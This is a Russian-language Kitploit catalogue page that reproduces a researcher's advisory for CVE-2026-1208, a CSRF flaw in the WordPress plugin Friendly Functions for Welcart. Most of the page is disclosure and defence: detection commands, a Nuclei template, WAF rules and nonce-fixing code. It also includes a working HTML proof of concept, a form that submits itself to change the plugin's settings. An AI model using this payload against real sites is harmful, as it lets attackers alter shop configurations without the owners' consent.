Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-1208 — Friendly Functions for Welcart <= 1.2.5 - Межсайтовая подделка запроса для обновления настроек | Kitploit
Инструменты/GitHubGitHub/snailsploit/cve-2026-1208
Анализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеСтатьи и ИсследованияОбучение и Образование
GitHubsnailsploit/cve-2026-1208

CVE-2026-1208

Friendly Functions for Welcart <= 1.2.5 - Межсайтовая подделка запроса для обновления настроек

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-1208: Межсайтовая подделка запросов в Friendly Functions for Welcart

CVE CVSS Score WordPress Plugin CWE-352 Wordfence

Ключевые слова: CVE-2026-1208, уязвимость Friendly Functions for Welcart, CSRF, межсайтовая подделка запросов, безопасность WordPress, уязвимость плагина WordPress, CWE-352, безопасность Welcart, манипулирование настройками, WordPress CVE 2026

Оглавление

  • Обзор
  • Сведения об уязвимости
  • Технический анализ
  • Вектор атаки
  • Доказательство концепции
  • Руководство по устранению
  • Метрики CVSS
  • Ссылки
  • Контакт для вопросов безопасности

Обзор

CSRF-уязвимость плагина Friendly Functions for Welcart для WordPress (CVE-2026-1208) — недостаток безопасности, позволяющий неаутентифицированным злоумышленникам изменять настройки плагина с помощью подделанных запросов.

В плагине Friendly Functions for Welcart была обнаружена уязвимость межсайтовой подделки запросов (CSRF), которая позволяет неаутентифицированным злоумышленникам изменять настройки плагина, обманом заставляя администратора перейти по вредоносной ссылке.

Обнаружил: Kai Aizen (SnailSploit)
Опубликовано: 23 января 2026 г.
Оценка CVSS: 4.3 (Средний)
CWE: CWE-352 — Межсайтовая подделка запросов (CSRF)
Плагин: Friendly Functions for Welcart
Тип атаки: Межсайтовая подделка запросов с обновлением настроек
Требуемые привилегии: Отсутствуют (неаутентифицированная атака + социальная инженерия)

Сведения об уязвимости

Описание

Плагин Friendly Functions for Welcart для WordPress уязвим к межсайтовой подделке запросов во всех версиях до 1.2.5 включительно. Это связано с отсутствием или некорректной проверкой nonce на странице настроек. Это позволяет неаутентифицированным злоумышленникам изменять настройки плагина с помощью подделанного запроса при условии, что им удастся обманом заставить администратора сайта выполнить какое-либо действие, например перейти по ссылке.

Влияние

Эта уязвимость позволяет неаутентифицированным злоумышленникам:

  • Изменять настройки плагина без авторизации
  • Манипулировать функциональностью электронной коммерции Welcart
  • Потенциально нарушать работу магазина
  • Комбинировать с другими уязвимостями для проведения усиленных атак

Затронутые версии

  • Уязвимые: Все версии ≤ 1.2.5
  • Исправленные: Версия 1.2.6 и выше

Метрики CVSS v3.1

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Технические детали

Уязвимость присутствует в реализации страницы настроек, где:

  1. Форма настроек плагина не имеет надлежащей проверки nonce
  2. Запросы на обновление настроек обрабатываются без проверки источника запроса
  3. CSRF-токены не генерируются и не проверяются
  4. Административные действия могут выполняться с помощью межсайтовых запросов

Места расположения уязвимого кода

Уязвимость была выявлена в следующих местах:

  • ffw_function_settings.php — строка 53
  • ffw_function_settings.php — строка 58

Вектор атаки

Атака требует применения социальной инженерии, чтобы обманом заставить аутентифицированного администратора зайти на вредоносную страницу или перейти по специально созданной ссылке, находясь в своей учётной записи WordPress.

root@kitploit:~
Target: WordPress Admin with Friendly Functions for Welcart installed
Method: Malicious HTML page with auto-submitting form
Trigger: Administrator clicks link or visits attacker-controlled page

Доказательство концепции

HTML-пейлоад CSRF

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2026-1208 - CSRF PoC</title>
</head>
<body>
    <h1>Loading...</h1>
    <form id="csrf-form" action="https://TARGET_SITE/wp-admin/admin.php?page=ffw-settings" method="POST">
        <input type="hidden" name="ffw_setting_option" value="malicious_value" />
        <!-- Add additional setting fields as needed -->
    </form>
    <script>
        document.getElementById('csrf-form').submit();
    </script>
</body>
</html>

⚠️ Предупреждение: Данный PoC предоставлен исключительно для образовательных целей и авторизованного тестирования.

Шаги тестирования

  1. Разверните экземпляр WordPress с плагином Friendly Functions for Welcart <= 1.2.5
  2. Разместите CSRF-пейлоад на сервере, контролируемом злоумышленником
  3. Войдите как администратор на целевой сайт WordPress
  4. Перейдите на страницу злоумышленника (имитация перехода по вредоносной ссылке)
  5. Убедитесь, что настройки плагина изменяются без явного согласия

Обнаружение

Проверка плагина WordPress

root@kitploit:~
# Check if vulnerable version is installed
wp plugin list | grep -i "friendly-functions-for-welcart"

# Get specific version
wp plugin get friendly-functions-for-welcart --field=version

Правила для сканеров безопасности

Шаблон Nuclei:

root@kitploit:~
id: CVE-2026-1208

info:
  name: Friendly Functions for Welcart - CSRF to Settings Update
  author: SnailSploit
  severity: medium
  description: |
    Friendly Functions for Welcart plugin for WordPress is vulnerable 
    to CSRF in versions <= 1.2.5 due to missing nonce validation.
  reference:
    - https://github.com/SnailSploit/CVE-2026-1208
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/friendly-functions-for-welcart/friendly-functions-for-welcart-125-cross-site-request-forgery-to-settings-update
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2026-1208
    cwe-id: CWE-352
  tags: cve,cve2026,wordpress,wp-plugin,csrf,welcart

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/friendly-functions-for-welcart/readme.txt"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Friendly Functions for Welcart"
      
      - type: regex
        regex:
          - "(?i)Stable tag:\\s*(1\\.([0-1]\\.[0-9]|2\\.[0-5]))"
      
      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "(?i)Stable tag:\\s*([0-9.]+)"

Правила брандмауэра веб-приложения (WAF)

Правило ModSecurity:

root@kitploit:~
# CVE-2026-1208 - Block CSRF attempts to FFW settings
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
    "chain,id:2026001,phase:2,t:none,t:urlDecodeUni,\
    log,deny,status:403,msg:'CVE-2026-1208 CSRF Attempt Blocked'"
    SecRule ARGS:page "@streq ffw-settings" \
        "chain"
        SecRule &REQUEST_HEADERS:Referer "@eq 0"

# Alternative: Block if referer doesn't match site domain
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
    "chain,id:2026002,phase:2,t:none,\
    log,deny,status:403,msg:'CVE-2026-1208 Cross-Origin Request Blocked'"
    SecRule ARGS:page "@streq ffw-settings" \
        "chain"
        SecRule REQUEST_HEADERS:Referer "!@contains yourdomain.com"

Правило Nginx:

root@kitploit:~
# CVE-2026-1208 - CSRF Protection for FFW Settings
location /wp-admin/admin.php {
    # Check for ffw-settings page without proper referer
    if ($arg_page = "ffw-settings") {
        set $csrf_check "1";
    }
    if ($http_referer !~ "^https?://(www\.)?yourdomain\.com") {
        set $csrf_check "${csrf_check}1";
    }
    if ($csrf_check = "11") {
        return 403;
    }
    
    # Pass to PHP handler
    try_files $uri =404;
    fastcgi_pass php-fpm;
    include fastcgi_params;
}

Устранение

Для администраторов сайта

Требуется немедленное действие:

  1. Немедленно обновите плагин Friendly Functions for Welcart до версии 1.2.6 или более поздней
  2. Проверьте настройки плагина на вашем сайте на предмет несанкционированных изменений
  3. Если вы не можете обновиться немедленно, рассмотрите возможность временного отключения плагина

Инструкции по обновлению

  1. Перейдите в раздел Плагины > Установленные плагины в админ-панели WordPress
  2. Найдите плагин «Friendly Functions for Welcart»
  3. Нажмите Обновить сейчас, чтобы обновиться до версии 1.2.6 или более поздней
  4. Убедитесь, что обновление прошло успешно
  5. Проверьте и подтвердите, что настройки плагина корректны

Для разработчиков

Убедитесь, что все формы настроек реализуют надлежащую CSRF-защиту:

root@kitploit:~
// Example of proper CSRF protection in WordPress
// In your form:
wp_nonce_field('ffw_settings_update', 'ffw_settings_nonce');

// In your form handler:
function process_settings_update() {
    // Verify nonce
    if (!isset($_POST['ffw_settings_nonce']) || 
        !wp_verify_nonce($_POST['ffw_settings_nonce'], 'ffw_settings_update')) {
        wp_die('Security check failed');
    }
    
    // Check capabilities
    if (!current_user_can('manage_options')) {
        wp_die('Unauthorized');
    }
    
    // Process settings update
    // ...
}

Хронология

  • 23 января 2026 г. — уязвимость публично раскрыта
  • 23 января 2026 г. — присвоен идентификатор CVE-2026-1208
  • Версия 1.2.6 — разработчиком плагина выпущено исправление

Ссылки

  • Запись в базе данных Wordfence Intelligence
  • WordPress Plugin Trac — строка 53
  • WordPress Plugin Trac — строка 58
  • Набор изменений плагина (исправление)
  • Запись CVE в MITRE

Благодарности

Исследователь:

  • Kai Aizen — SnailSploit

Процесс раскрытия: Координация через программу Bug Bounty компании Wordfence

Отказ от ответственности

Данная информация предоставлена исключительно для исследований в области безопасности и защитных целей. Любая эксплуатация этой уязвимости в злонамеренных целях незаконна и неэтична. Всегда получайте надлежащее разрешение перед тестированием систем, которые вам не принадлежат.

Контакты

По вопросам или за дополнительной информацией об этой уязвимости:

  • Эл. почта: [email protected]
  • Веб-сайт: snailsploit.com
  • Организация: SnailSploit Security Research

Последнее обновление: 23 января 2026 г.


📚 Документация и автор

Полное описание этого проекта, методология и связанные исследования доступны по адресу:

https://snailsploit.com/security-research/cves/cve-2026-1208/

Создано Kai Aizen — независимым исследователем безопасности (offensive security).

snailsploit.com · Исследования · Фреймворки · GitHub · LinkedIn · ResearchGate · X/Twitter

Та же атака. Другой субстрат.

Скачать инструмент
МетрикаЗначение
Вектор атакиСеть (AV:N)
Сложность атакиНизкая (AC:L)
Требуемые привилегииОтсутствуют (PR:N)
Взаимодействие с пользователемТребуется (UI:R)
Область действияБез изменений (S:U)
КонфиденциальностьОтсутствует (C:N)
ЦелостностьНизкая (I:L)
ДоступностьОтсутствует (A:N)